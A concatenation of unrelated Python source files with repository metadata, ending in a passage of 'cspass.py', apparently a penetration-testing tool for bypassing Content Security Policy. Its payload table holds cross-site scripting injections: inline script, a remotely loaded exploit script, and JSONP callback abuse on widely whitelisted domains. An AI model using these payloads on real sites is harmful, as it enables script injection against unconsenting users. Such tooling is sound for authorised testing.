] | 1 | 2020-06-22T10:05:23.000Z | 2020-06-22T10:05:23.000Z | analyze/install.py | takkii/Pylean | d51595e2788e946d9a2492bbe7131e4ada19062f | [
"MIT"
] | null | null | null | analyze/install.py | takkii/Pylean | d51595e2788e946d9a2492bbe7131e4ada19062f | [
"MIT"
] | null | null | null | import importlib
import platform
import site
import subprocess
import sys
import traceback
class InstallerClass:
    """Installs this project's python package dependencies via pip.

    The ``*_win`` commands use the ``python`` launcher (Windows); the plain
    attributes use ``python3`` (macOS / Linux). Each public ``*_method``
    keeps its original name so existing callers are unaffected.
    """

    # pip install commands for Windows ('python' launcher)
    sci_win = ['python', '-m', 'pip', 'install', 'scikit-learn']
    nump_win = ['python', '-m', 'pip', 'install', 'numpy']
    pan_win = ['python', '-m', 'pip', 'install', 'pandas']
    req_win = ['python', '-m', 'pip', 'install', 'requests-html']
    bs4_win = ['python', '-m', 'pip', 'install', 'beautifulsoup4']
    mat_win = ['python', '-m', 'pip', 'install', 'matplotlib']

    # pip install commands for macOS / Linux ('python3')
    sci = ['python3', '-m', 'pip', 'install', 'scikit-learn']
    nump = ['python3', '-m', 'pip', 'install', 'numpy']
    pan = ['python3', '-m', 'pip', 'install', 'pandas']
    req = ['python3', '-m', 'pip', 'install', 'requests-html']
    bs4 = ['python3', '-m', 'pip', 'install', 'beautifulsoup4']
    mat = ['python3', '-m', 'pip', 'install', 'matplotlib']

    @staticmethod
    def _run(command):
        """Run one pip install command, print the result, swallow errors.

        Consolidates the identical try/except bodies that the twelve
        public methods previously duplicated verbatim.
        """
        try:
            result = subprocess.run(command, encoding='utf-8', stderr=subprocess.PIPE)
            print(result)
        except Exception:
            traceback.print_exc()

    # -- Windows --------------------------------------------------------
    def sci_win_method(self):
        self._run(self.sci_win)

    def nump_win_method(self):
        self._run(self.nump_win)

    def pan_win_method(self):
        self._run(self.pan_win)

    def req_win_method(self):
        self._run(self.req_win)

    def bs4_win_method(self):
        self._run(self.bs4_win)

    def mat_win_method(self):
        self._run(self.mat_win)

    # -- macOS / Linux --------------------------------------------------
    def sci_method(self):
        self._run(self.sci)

    def nump_method(self):
        self._run(self.nump)

    def pan_method(self):
        self._run(self.pan)

    def req_method(self):
        self._run(self.req)

    def bs4_method(self):
        self._run(self.bs4)

    def mat_method(self):
        self._run(self.mat)
# Run the installer matching the current interpreter and platform.
if sys.version_info[0] == 2:
    print("This installer is Python2 not supported.")
elif sys.version_info[0] == 3:
    pf = platform.system()
    if pf == 'Windows':
        InstClass = InstallerClass()
        InstClass.sci_win_method()
        InstClass.nump_win_method()
        InstClass.pan_win_method()
        InstClass.req_win_method()
        InstClass.bs4_win_method()
        InstClass.mat_win_method()
    elif pf in ('Darwin', 'Linux'):
        # macOS and Linux previously had two byte-identical branches; merged
        InstClass = InstallerClass()
        InstClass.sci_method()
        InstClass.nump_method()
        InstClass.pan_method()
        InstClass.req_method()
        InstClass.bs4_method()
        InstClass.mat_method()
    else:
        print("Installer does not support OS other than Windows, MacOS and Linux kernel.")
else:
    print("A version other than Python2 and Python3. Does not match.")

# reload site so packages installed above become importable in this process
importlib.reload(site)
| 31.355705 | 98 | 0.596747 | 3,458 | 0.740154 | 0 | 0 | 0 | 0 | 0 | 0 | 746 | 0.159675 |
d32c8a2b7b92d8fdaee8fe0058c22508187e19a3 | 5,871 | py | Python | ros2_workspace/src/kumo/kumo/handlers/node_handler.py | ichiro-its/kumo-playground | 26163a5d80a81976482014855cf2796a44182608 | [
"MIT"
] | 2 | 2021-03-07T12:27:11.000Z | 2021-03-19T16:25:59.000Z | ros2_workspace/src/kumo/kumo/handlers/node_handler.py | ichiro-its/kumo-playground | 26163a5d80a81976482014855cf2796a44182608 | [
"MIT"
] | 20 | 2021-03-07T12:05:52.000Z | 2021-07-22T13:33:13.000Z | ros2_workspace/src/kumo/kumo/handlers/node_handler.py | ichiro-its/kumo-playground | 26163a5d80a81976482014855cf2796a44182608 | [
"MIT"
] | 1 | 2021-12-02T01:24:40.000Z | 2021-12-02T01:24:40.000Z | # Copyright (c) 2021 Ichiro ITS
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import rclpy
from rclpy.logging import get_logger
from rosidl_runtime_py.utilities import get_message, get_service
from kumo.handlers.base_handler import BaseHandler, Connection
from kumo.handlers.client_handler import ClientHandler
from kumo.handlers.publisher_handler import PublisherHandler
from kumo.handlers.service_handler import ServiceHandler
from kumo.handlers.subscription_handler import SubscriptionHandler
from kumo.message import Message, MessageType
class NodeHandler(BaseHandler):
    """Handler wrapping a ROS 2 node.

    Creates child handlers (publisher, subscription, client, service) on
    this node in response to incoming messages, and reports results or
    errors back over the connection.
    """

    def __init__(self, connection: Connection, name: str):
        super().__init__(connection)

        self.node = rclpy.create_node(name)
        self.logger = get_logger('node_%s' % self.id)

    def destroy(self) -> bool:
        """Destroy this handler and its underlying ROS node.

        Returns True when the node was destroyed by this call, False when
        the base handler reports it was already destroyed.
        """
        if super().destroy():
            self.logger.warn('Destroying Node...')
            self.node.destroy_node()
            # bug fix: honor the declared bool return type (previously
            # always returned None)
            return True

        return False

    async def handle_message(self, message: Message) -> None:
        """Dispatch an incoming message to the matching handler.

        On failure the error is logged and reported back to the client;
        in all cases the message is then passed on to the base handler.
        """
        # consolidates five previously duplicated try/except arms
        dispatch = {
            MessageType.DESTROY_NODE: (self.handle_destroy_node, 'destroy Node'),
            MessageType.CREATE_PUBLISHER: (self.handle_create_publisher, 'create a Publisher'),
            MessageType.CREATE_SUBSCRIPTION: (self.handle_create_subscription, 'create a Subscription'),
            MessageType.CREATE_CLIENT: (self.handle_create_client, 'create a Client'),
            MessageType.CREATE_SERVICE: (self.handle_create_service, 'create a Service'),
        }

        entry = dispatch.get(message.type)
        if entry is not None:
            handler, action = entry
            try:
                return await handler(message)
            except Exception as e:
                self.logger.error('Failed to %s! %s' % (action, str(e)))
                await self.send_error_response(message, e)

        await super().handle_message(message)

    async def handle_destroy_node(self, message: Message) -> None:
        """Destroy this node if the message targets it, then acknowledge."""
        if message.content.get('node_id') == self.id:
            self.destroy()
            await self.send_response(message, {'node_id': self.id})

    async def handle_create_publisher(self, message: Message) -> None:
        """Create a PublisherHandler on this node and report its id."""
        if message.content.get('node_id') == self.id:
            publisher = PublisherHandler(
                self.connection, self.node,
                get_message(message.content.get('message_type')),
                message.content.get('topic_name'))

            self.attach(publisher)
            self.logger.info('Publisher %s created!' % publisher.id)

            await self.send_response(message, {'publisher_id': publisher.id})

    async def handle_create_subscription(self, message: Message) -> None:
        """Create a SubscriptionHandler on this node and report its id."""
        if message.content.get('node_id') == self.id:
            subscription = SubscriptionHandler(
                self.connection, self.node,
                get_message(message.content.get('message_type')),
                message.content.get('topic_name'))

            self.attach(subscription)
            self.logger.info('Subscription %s created!' % subscription.id)

            await self.send_response(message, {'subscription_id': subscription.id})

    async def handle_create_client(self, message: Message) -> None:
        """Create a ClientHandler on this node and report its id."""
        if message.content.get('node_id') == self.id:
            client = ClientHandler(
                self.connection, self.node,
                get_service(message.content.get('service_type')),
                message.content.get('service_name'))

            self.attach(client)
            self.logger.info('Client %s created!' % client.id)

            await self.send_response(message, {'client_id': client.id})

    async def handle_create_service(self, message: Message) -> None:
        """Create a ServiceHandler on this node and report its id."""
        if message.content.get('node_id') == self.id:
            service = ServiceHandler(
                self.connection, self.node,
                get_service(message.content.get('service_type')),
                message.content.get('service_name'))

            self.attach(service)
            self.logger.info('Service %s created!' % service.id)

            await self.send_response(message, {'service_id': service.id})
| 41.055944 | 83 | 0.656788 | 4,313 | 0.734628 | 0 | 0 | 0 | 0 | 3,899 | 0.664112 | 1,567 | 0.266905 |
d32d334b2b10906c6a65aadf1d57e8f4c1285936 | 6,560 | py | Python | rcnn.py | PlanetExp/rcnn | c0f26c18c17334d7185a83b60c68eaf4357246bf | [
"Apache-2.0"
] | null | null | null | rcnn.py | PlanetExp/rcnn | c0f26c18c17334d7185a83b60c68eaf4357246bf | [
"Apache-2.0"
] | null | null | null | rcnn.py | PlanetExp/rcnn | c0f26c18c17334d7185a83b60c68eaf4357246bf | [
"Apache-2.0"
] | null | null | null | """RCNN model
"""
import tensorflow as tf
from define_scope import define_scope # custom decorators
class Model:
    """Convolutional model over 9x9 single-channel boards (TF 1.x graph API)."""

    def __init__(self, X, y, output_size=None,
                 learning_rate=1e-5, learning_rate_decay=0.95,
                 reg=1e-5, dropout=0.5, verbose=False):
        """
        Initialize the model.

        Inputs:
        - X: input tensor/placeholder of shape [N, 9, 9, 1]
        - y: integer label tensor/placeholder of shape [N]
        - output_size: number of classes C
        - learning_rate: Scalar giving learning rate for optimization.
        - learning_rate_decay: Scalar giving factor used to decay the learning rate
          after each epoch.
        - reg: regularization strength (accepted but currently unused)
        - dropout: keep probability for the dropout layer
        - verbose: verbosity flag (accepted but currently unused)
        """
        self.X = X
        self.y = y
        # kept so inference can size the output layer (was hard-coded to 2)
        self.output_size = output_size
        self.learning_rate = learning_rate
        self.learning_rate_decay = learning_rate_decay
        self.dropout = dropout

        # Store layers weight & bias
        self.params = {
            # input is [1, 9, 9, 1]
            # 1x1 conv, 1 input, 32 outputs
            'Wc1': tf.Variable(tf.random_normal([1, 1, 1, 32]), name='Wc1'),
            # 3x3 conv, 32 inputs, 32 outputs
            'Wc2': tf.Variable(tf.random_normal([3, 3, 32, 32]), name='Wc2'),  # shared
            # fully connected, 9*9*32 inputs, 32 outputs
            'Wd1': tf.Variable(tf.random_normal([9 * 9 * 32, 32])),
            # 32 inputs, C outputs (class prediction)
            'Wout': tf.Variable(tf.random_normal([32, output_size])),  # n_classes
            # biases
            'bc1': tf.Variable(tf.random_normal([32])),
            'bc2': tf.Variable(tf.random_normal([32])),
            'bd1': tf.Variable(tf.random_normal([32])),
            'bout': tf.Variable(tf.random_normal([output_size]))  # n_classes
        }

    @define_scope
    def inference(self):
        """
        Set up the inference graph of the model.

        Returns:
            logits tensor of shape [N, output_size]
        """

        def weight_variable(shape):
            """Create a weight variable with appropriate initialization."""
            initial = tf.truncated_normal(shape, stddev=0.1)
            return tf.Variable(initial)

        def bias_variable(shape):
            """Create a bias variable with appropriate initialization."""
            initial = tf.constant(0.1, shape=shape)
            return tf.Variable(initial)

        def variable_summaries(var, name):
            """Attach a lot of summaries to a Tensor."""
            with tf.name_scope('summaries'):
                mean = tf.reduce_mean(var)
                tf.scalar_summary('mean/' + name, mean)
                with tf.name_scope('stddev'):
                    stddev = tf.sqrt(tf.reduce_mean(tf.square(var - mean)))
                tf.scalar_summary('stddev/' + name, stddev)
                tf.scalar_summary('max/' + name, tf.reduce_max(var))
                tf.scalar_summary('min/' + name, tf.reduce_min(var))
                tf.histogram_summary(name, var)

        def nn_layer(input_tensor, input_dim, output_dim, layer_name, act=tf.nn.relu):
            """Reusable fully-connected layer with tensorboard summaries.

            See: https://github.com/tensorflow/tensorflow/blob/r0.11/tensorflow/examples/tutorials/mnist/mnist_with_summaries.py
            """
            with tf.name_scope(layer_name):
                # This Variable will hold the state of the weights for the layer
                with tf.name_scope('weights'):
                    weights = weight_variable([input_dim, output_dim])
                    variable_summaries(weights, layer_name + '/weights')
                with tf.name_scope('biases'):
                    biases = bias_variable([output_dim])
                    variable_summaries(biases, layer_name + '/biases')
                with tf.name_scope('Wx_plus_b'):
                    preactivate = tf.matmul(input_tensor, weights) + biases
                    tf.histogram_summary(layer_name + '/pre_activations', preactivate)
                activations = act(preactivate, name='activation')
                tf.histogram_summary(layer_name + '/activations', activations)
                return activations

        def conv_relu(input_tensor, kernel_shape, bias_shape):
            """conv2d + bias + relu using get_variable so weights can be shared."""
            # Create variable named "weights".
            weights = tf.get_variable("weights", kernel_shape,
                                      initializer=tf.random_normal_initializer())
            # Create variable named "biases".
            biases = tf.get_variable("biases", bias_shape,
                                     initializer=tf.constant_initializer(0.0))
            conv = tf.nn.conv2d(input_tensor, weights,
                                strides=[1, 1, 1, 1], padding='SAME')
            return tf.nn.relu(conv + biases)

        def board_filter(input_board):
            """Two stacked 3x3 conv+relu layers (32 -> 32 channels)."""
            # bug fix: this helper takes only the input tensor; the old
            # call sites passed kernel/bias shape args it never accepted
            with tf.variable_scope('conv1'):
                relu1 = conv_relu(input_board, [3, 3, 32, 32], [32])
            with tf.variable_scope('conv2'):
                return conv_relu(relu1, [3, 3, 32, 32], [32])

        # Unpack parameters
        X = self.X
        params = self.params

        # 1x1 convolution lifting the single input channel to 32 channels
        with tf.variable_scope('conv1'):
            # bug fix: conv_relu was called with an extra 'conv1' name arg
            conv1 = conv_relu(X, [1, 1, 1, 32], [32])

        # Two passes of the board filter sharing weights within the scope
        with tf.variable_scope('board_filters') as scope:
            # bug fix: results were bound to result1/result2 while later
            # code referenced undefined conv2/conv3 (NameError)
            conv2 = board_filter(conv1)
            scope.reuse_variables()  # share weights between both passes
            conv3 = board_filter(conv2)

        # Fully connected layer
        # Reshape conv output to fit fully connected layer input
        fc1 = tf.reshape(conv3, [-1, 9 * 9 * 32])
        fc1 = tf.add(tf.matmul(fc1, params['Wd1']), params['bd1'])
        fc1 = tf.nn.relu(fc1)

        # Apply Dropout
        with tf.name_scope('dropout'):
            tf.scalar_summary('dropout_keep_probability', self.dropout)
            fc1 = tf.nn.dropout(fc1, self.dropout)

        # Output, class prediction
        # bug fix: output dimension was hard-coded to 2; use output_size.
        # NOTE(review): params['Wout']/'bout' remain unused because nn_layer
        # creates its own weights — confirm which was intended.
        out = nn_layer(fc1, 32, self.output_size, 'out', act=tf.identity)
        return out

    @define_scope
    def train(self):
        """
        Adam optimization op minimizing the cross-entropy loss.
        """
        with tf.name_scope('train'):
            optimizer = tf.train.AdamOptimizer(learning_rate=self.learning_rate)
            minimize = optimizer.minimize(self.loss)
        return minimize

    @define_scope
    def loss(self):
        """
        Mean softmax cross-entropy between logits and integer labels.
        """
        with tf.name_scope('cross_entopy'):
            diff = tf.nn.sparse_softmax_cross_entropy_with_logits(
                logits=self.inference, labels=self.y)
            with tf.name_scope('total'):
                cross_entropy = tf.reduce_mean(diff)
        # NOTE(review): mixes tf.summary.scalar here with the legacy
        # tf.scalar_summary API elsewhere — confirm the target TF version
        tf.summary.scalar('cross_entropy', cross_entropy)
        return cross_entropy

    @define_scope
    def predict(self):
        """
        Top-1 accuracy of the logits against the labels.
        """
        with tf.name_scope('accuracy'):
            with tf.name_scope('correct_prediction'):
                correct_prediction = tf.nn.in_top_k(self.inference, self.y, 1)
            with tf.name_scope('accuracy'):
                accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
            tf.scalar_summary('accuracy', accuracy)
        return accuracy
| 32.156863 | 119 | 0.685366 | 6,455 | 0.983994 | 0 | 0 | 5,066 | 0.772256 | 0 | 0 | 2,291 | 0.349238 |
d32d4989ddb61c61ac3a74c50608bb06d99de21a | 4,016 | py | Python | nihongo_companion/dictionary/nihongomaster.py | northy/anki-nihongo-companion | d238c3a0b0b195e857b0914570a824a492d2840c | [
"MIT"
] | 1 | 2021-10-14T21:30:56.000Z | 2021-10-14T21:30:56.000Z | nihongo_companion/dictionary/nihongomaster.py | northy/anki-nihongo-companion | d238c3a0b0b195e857b0914570a824a492d2840c | [
"MIT"
] | 2 | 2021-10-08T00:30:22.000Z | 2021-10-30T02:10:37.000Z | nihongo_companion/dictionary/nihongomaster.py | northy/anki-nihongo-companion | d238c3a0b0b195e857b0914570a824a492d2840c | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# MIT License
# Copyright (c) 2021 Alexsandro Thomas
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from .base import *
class NihongoMaster(WebDict) :
    """Dictionary backend that scrapes nihongomaster.com search results."""

    def search(self, query:str) -> Generator[list,int,int] :
        """Search the dictionary, yielding one page of results at a time.

        Yields tuples ``(results, current, total)`` where ``results`` is a
        list of entry dicts and ``current``/``total`` are the result counts
        reported by the site. Yields ``(None, None, None)`` and stops if a
        page cannot be fetched or parsed.
        """
        query = quote(query)
        page = 1
        while True : #page
            soup = self.__urlGet__(f"https://nihongomaster.com/japanese/dictionary/search?type=j&q={query}&p={str(page)}")
            if soup==None : yield None, None, None; break

            results = soup.find("div", class_="results")
            if results==None : yield None, None, None; break

            # bug fix: build a fresh list for every page instead of
            # clearing the previously yielded one — .clear() mutated the
            # very list object the consumer was still holding
            page_results = []
            for result in results.find_all("div") :
                page_results.append({
                    "title": result.find("h2").text,
                    "kana": result.find("h3").text if result.find("h3")!=None else result.find("h2").text, #may not have kana
                    "type": result.find("dt").text,
                    "english": list(map(lambda x : x.text, result.find_all("li"))),
                    "uri": result.find("a", href=True)["href"]
                })

            count = soup.find("h1", class_='text-lg md:text-2xl xl:text-4xl font-bold text-center md:text-left mt-4').text.strip().split()
            cur,tot = int(count[4]), int(count[6])
            yield page_results, cur, tot
            if cur==tot : break
            page+=1

    def get_examples(self, uri:str) -> List[dict] :
        """Fetch example sentences for a dictionary entry.

        :param uri: entry page URI as returned in a search result's "uri"
        :return: list of {'japanese', 'english'} dicts, or None on failure
        """
        soup = self.__urlGet__(uri)
        if soup==None : return None

        results = soup.find("div", id="examples")
        if results==None : return None

        return_results = []
        try :
            for result in results.find("div", class_="w-full").find_all("div", class_="flex") :
                return_results.append({
                    "japanese": ''.join(map(lambda x : x.strip(),result.find("div", class_="p-2 font-bold").find_all(text=True))),
                    "english": result.find_all("div")[1].text.strip()
                })
        except :
            # best-effort scrape: any unexpected page structure yields None
            return None
        return return_results
if __name__=="__main__" :
    print("(Using nihongoMaster webdict as dictionary)")
    nm = NihongoMaster()
    query = input("What to search? ")

    # bug fix: search() is a generator of (page_results, cur, tot) tuples;
    # the old code indexed it like a flat list of entry dicts (TypeError).
    # Collect every page into one flat list before displaying.
    results = []
    for page_results, cur, tot in nm.search(query) :
        if page_results is None : break
        results.extend(page_results)

    if results :
        for i, result in enumerate(results, start=1) :
            print(str(i)+')')
            print(result["title"])
            print(result["kana"])
            print(result["type"])
            for english in result["english"] :
                print(' -',english)
            print()
    else :
        print("Nothing found")
        exit(1)

    option = int(input("which one? "))
    examples = nm.get_examples(results[option-1]["uri"])
    if examples!=None :
        for example in examples :
            print(example["japanese"])
            print(example["english"])
            print()
    else :
        print("No examples")
        exit(1)
| 38.990291 | 138 | 0.594871 | 1,997 | 0.497261 | 1,269 | 0.315986 | 0 | 0 | 0 | 0 | 1,639 | 0.408118 |
d32db38b32c9c1c912fe1cbdd41b39ddaa026dbb | 437 | py | Python | src/aceinna/devices/configs/openimu_predefine.py | LukaszChl/ros_openimu | 1bcf547fa42ee7c7dcc856c1d4eb5702d301b059 | [
"Apache-2.0"
] | 6 | 2021-03-18T16:18:53.000Z | 2022-01-18T15:32:15.000Z | src/aceinna/devices/configs/openimu_predefine.py | LukaszChl/ros_openimu | 1bcf547fa42ee7c7dcc856c1d4eb5702d301b059 | [
"Apache-2.0"
] | 11 | 2020-12-22T16:19:20.000Z | 2022-02-11T11:03:25.000Z | src/aceinna/devices/configs/openimu_predefine.py | LukaszChl/ros_openimu | 1bcf547fa42ee7c7dcc856c1d4eb5702d301b059 | [
"Apache-2.0"
] | 11 | 2021-04-12T03:00:28.000Z | 2022-03-25T19:53:43.000Z | """
predefined params for openimu
"""
JSON_FILE_NAME = 'openimu.json'
def get_app_names():
'''
define openimu app type
'''
app_names = ['Compass',
'IMU',
'INS',
'Leveler',
'OpenIMU',
'VG',
'VG_AHRS',
]
return app_names
APP_STR = ['INS', 'VG', 'VG_AHRS', 'Compass', 'Leveler', 'IMU', 'OpenIMU']
| 19 | 74 | 0.434783 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 190 | 0.434783 |
d32dd1934f4c68dc0cb20d9f2ee7231658679268 | 4,073 | py | Python | app.py | dhill2522/DroneWeatherApi | fe8196c78597d4089359cd872491441690f6899f | [
"MIT"
] | null | null | null | app.py | dhill2522/DroneWeatherApi | fe8196c78597d4089359cd872491441690f6899f | [
"MIT"
] | null | null | null | app.py | dhill2522/DroneWeatherApi | fe8196c78597d4089359cd872491441690f6899f | [
"MIT"
] | null | null | null | from flask import Flask, request, Response
from flask_cors import CORS
import drone_awe
import json
import copy
import traceback
import utilities
'''
Notes:
- Need to disable plotting in the library
- if possible remove matplotlib entirely from the library
- if possible remove gekko object from a.output in order to make it JSONSerializable
'''
app = Flask(__name__)
CORS(app)
@app.route('/')
def root():
    """API index route: identify the service."""
    payload = {
        'msg': 'Drones and weather API 0.0.2. See DroneEcon.com for details.'
    }
    return json.dumps(payload)
@app.route('/getValidationCases')
def getValidationCases():
    """Return validation-database entries that carry x-axis data."""
    try:
        cases = [case for case in drone_awe.validationdatabase if 'xvalid' in case]
        return Response(json.dumps(cases))
    except Exception as err:
        return utilities.handleError(err)
@app.route('/getDrones')
def getDrones():
    """Return the drone database with raw parameter names mapped to
    display names via utilities.ParamMap.

    Nested 'battery' parameters are flattened into the top-level dict.
    """
    try:
        drones = copy.deepcopy(drone_awe.drones)
        resp = []
        for drone in drones:
            el = {}
            # flatten nested battery parameters first
            if 'battery' in drone:
                for prop in drone['battery']:
                    matches = list(filter(lambda entry: entry['param'] == prop, utilities.ParamMap))
                    if len(matches) > 0:
                        el[matches[0]['display']] = drone['battery'][prop]
                del drone['battery']
            for prop in drone:
                matches = list(filter(lambda entry: entry['param'] == prop, utilities.ParamMap))
                if len(matches) > 0:
                    el[matches[0]['display']] = drone[prop]
            resp.append(el)
        return Response(json.dumps(resp))
    except Exception as err:
        # bug fix: the error response was computed but never returned
        return utilities.handleError(err)
# bug fix: removed a stray module-level `a.simulate()` line that raised
# NameError as soon as this module was imported
@app.route('/simulate', methods=['POST'])
def simulate():
    """Run a drone_awe simulation with the POSTed parameters and return
    the plottable output series mapped to display names."""
    try:
        # z-axis parameter id; currently never set (see commented line below)
        zParam = None

        params = {}
        if request.data:
            params = json.loads(request.data)
            # zParam = params['zParam']

        # fill in any missing arguments with their defaults
        for arg in utilities.DefaultArgs:
            if arg['name'] not in params:
                # bug fix: was print(f'Missing', {arg['name']}, ...) which
                # printed set literals like {'name'} instead of the values
                print(f"Missing {arg['name']}. Using default value: {arg['default']}")
                params[arg['name']] = arg['default']

        a = drone_awe.model(params)
        try:
            a.simulate()
            data = a.output
            resp = {
                'error': False,
                'errorType': None,
                'log': 'Successful simulation',
                'plottables': [],
                'zAxis': {
                    'id': zParam,
                    'displayName': '',
                    'values': []
                }
            }
            if zParam:
                resp['zAxis']['displayName'] = data['zvals']

            # collect every numeric output series that has a display name
            for key in list(data.keys()):
                if key != 'zvals' and not isinstance(data[key][0][0], str):
                    matches = list(filter(lambda entry: entry['param'] == key, utilities.ParamMap))
                    if len(matches) >= 1:
                        plottable = {
                            'id': key,
                            'displayName': matches[0]['display'],
                            'values': data[key]
                        }
                        if key == 'missionspeed':
                            print(plottable)
                        resp['plottables'].append(plottable)
                    else:
                        print(f'Missing ParamMep entry for {key}')

            return Response(json.dumps(resp))
        except Exception as err:
            # simulation failed: report the error but keep the response shape
            resp = {
                'error': True,
                'errorType': None,
                'log': 'Simulation failed: ' + err.__repr__(),
                'plottables': [],
                'zAxis': {
                    'id': zParam,
                    'displayName': '',
                    'values': []
                }
            }
            return Response(json.dumps(resp))
    except Exception as err:
        return utilities.handleError(err)
if __name__ == '__main__':
    # Start the Flask development server when executed directly
    # (not when imported by a WSGI server).
    app.run()
| 30.395522 | 90 | 0.470169 | 0 | 0 | 0 | 0 | 3,629 | 0.890989 | 0 | 0 | 848 | 0.2082 |
d32e8c56edc32689975959c28267b672389c92f8 | 25,521 | py | Python | cspass.py | Ruulian/CSPass | e608331b429e9a7e759ef4f54a66b25a179f724a | [
"MIT"
] | 30 | 2021-11-01T15:55:39.000Z | 2022-03-24T16:57:23.000Z | cspass.py | Ruulian/CSPass | e608331b429e9a7e759ef4f54a66b25a179f724a | [
"MIT"
] | 1 | 2022-01-30T13:45:29.000Z | 2022-01-30T14:43:10.000Z | cspass.py | Ruulian/CSPass | e608331b429e9a7e759ef4f54a66b25a179f724a | [
"MIT"
] | 2 | 2021-11-08T15:52:33.000Z | 2022-02-10T09:19:50.000Z | #! /usr/bin/env python3
# -*- coding: utf-8 -*-
# Author : @Ruulian_
# Date created : 31 Oct 2021
from random import choice
from requests_html import HTMLSession
from selenium import webdriver
from selenium.common.exceptions import TimeoutException
from selenium.webdriver.firefox.options import Options as FirefoxOptions
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.support.ui import WebDriverWait
from urllib.parse import urljoin, urlparse
import argparse
import datetime
import json
import platform
import re
import time
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# Accent color for console output, picked once per run (ANSI SGR codes:
# 35 magenta, 93 bright yellow, 33 yellow).
color = choice([35, 93, 33])
# Regexes matching CSP "nonce-<base64>" and "shaNNN-<base64>" source
# expressions; used by Page.test_patch to detect mitigations that would
# neutralize an otherwise-exploitable directive value.
nonce_reg = r'nonce\-(?:[A-Za-z0-9+/]{4})*(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=)?'
sha_reg = r'sha\d{3}\-(?:[A-Za-z0-9+/]{4})*(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=)?'
# JavaScript every payload ultimately tries to run; the resulting alert()
# popup is the success signal Form.exploit waits for.
general_payload = "alert()"
# CSP fallback chain: when the key directive is absent from the policy, the
# value directive governs instead (default-src fallback per the CSP spec).
policies_fallback = {
    "script-src":"default-src"
}
# Known-bypassable CSP configurations, keyed by directive. Each entry gives:
#   'value'   - directive values that must ALL be present for the bypass,
#   'patch'   - (directive, regex) pairs that, when matched, mitigate it,
#   'payload' - the HTML to inject. Most entries abuse JSONP endpoints on
#               hosts commonly whitelisted in real-world CSPs.
vulnerable_CSP_conf = {
    "script-src" : [
        {'value': ['unsafe-inline'], 'patch':[('script-src', nonce_reg), ('script-src', sha_reg)], 'payload': f'<script>{general_payload}</script>'},
        {'value': ['unsafe-inline'], 'patch':[('script-src', nonce_reg), ('script-src', sha_reg)], 'payload': f'<img src=# onerror={general_payload}>'},
        {'value': ['*'], 'patch':[], 'payload': '<script src="https://0xhorizon.eu/cspass/exploit.js"></script>'},
        {'value': ['data:'], 'patch':[], 'payload': f'<script src="data:,{general_payload}"></script>'},
        {'value':['https://cdnjs.cloudflare.com', 'unsafe-eval'], 'patch':[], 'payload':"<script src=\"https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.4.6/angular.js\"></script><div ng-app> {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };%s;//');}} </div>" % general_payload},
        {'value': ['https://*.google.com'], 'patch':[], 'payload': f'"><script src="https://www.google.com/complete/search?client=chrome&q=hello&callback={general_payload}"></script>'},
        {'value': ['https://*.doubleclick.net'], 'patch':[], 'payload': f'"><script src="https://googleads.g.doubleclick.net/pagead/conversion/1036918760/wcm?callback={general_payload}"></script>'},
        {'value': ['https://*.googleadservices.com'], 'patch':[], 'payload': f'"><script src="https://www.googleadservices.com/pagead/conversion/1070110417/wcm?callback={general_payload}"></script>'},
        {'value': ['https://*.google.com'], 'patch':[], 'payload': f'"><script src="https://cse.google.com/api/007627024705277327428/cse/r3vs7b0fcli/queries/js?callback={general_payload}"></script>'},
        {'value': ['https://*.google.com'], 'patch':[], 'payload': f'"><script src="https://accounts.google.com/o/oauth2/revoke?callback={general_payload}"></script>'},
        {'value': ['https://*.blogger.com'], 'patch':[], 'payload': f'"><script src="https://www.blogger.com/feeds/5578653387562324002/posts/summary/4427562025302749269?callback={general_payload}"></script>'},
        {'value': ['https://*.yandex.net'], 'patch':[], 'payload': f'"><script src="https://translate.yandex.net/api/v1.5/tr.json/detect?callback={general_payload}"></script>'},
        {'value': ['https://*.yandex.ru'], 'patch':[], 'payload': f'"><script src="https://api-metrika.yandex.ru/management/v1/counter/1/operation/1?callback={general_payload}"></script>'},
